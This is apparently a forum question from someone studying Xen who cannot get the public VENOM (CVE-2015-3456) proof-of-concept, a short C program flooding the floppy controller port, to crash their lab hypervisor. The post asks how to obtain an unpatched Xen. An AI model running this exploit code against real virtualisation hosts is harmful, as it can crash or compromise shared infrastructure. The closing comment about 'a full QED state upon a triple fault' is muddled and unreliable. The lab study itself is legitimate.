# I'm trying to exploit xen hypervisor for studying

Tags: ubuntu, exploit, xen, hypervisor

I am studying xen hypervisor and want to exploit it. 
I followed ubuntu community (https://help.ubuntu.com/community/Xen).
Host OS is ubuntu 14.04 LTS and guest OS is centOS 6.7 minimal, and I use 4.4.2 xen.
I succeeded in following above steps and operating guest OS.
Then, I selected vulnerablity for CVE-2015-3456 (VENOM) because it is quite popular. I thought It was good to start. According to venom, qemu is vulnerable and xen uses qemu for HVM guest.
I got POC code below. But it didn't work even though I tried some ways.

```
#include <sys/io.h>
#define FIFO 0x3f5
int main() {
    int i;
    iopl(3);
    outb(0x0a,0x3f5); /* READ ID */
    for (i=0;i<10000000;i++)
            outb(0x42,0x3f5); /* push */
}
```

[screenshot](https://i.stack.imgur.com/zowGJ.png)
Now, I guess this vulnerability may have been already patched and I installed patched xen.
If I think right way, is there way to get unpatched xen and make environment that I want? I'm very appreciate it if you give some advice.

Comment: The easiest way to test such an exploit is to install a set of two faulty exception handlers, as QEMU gives a full QED state upon a triple fault.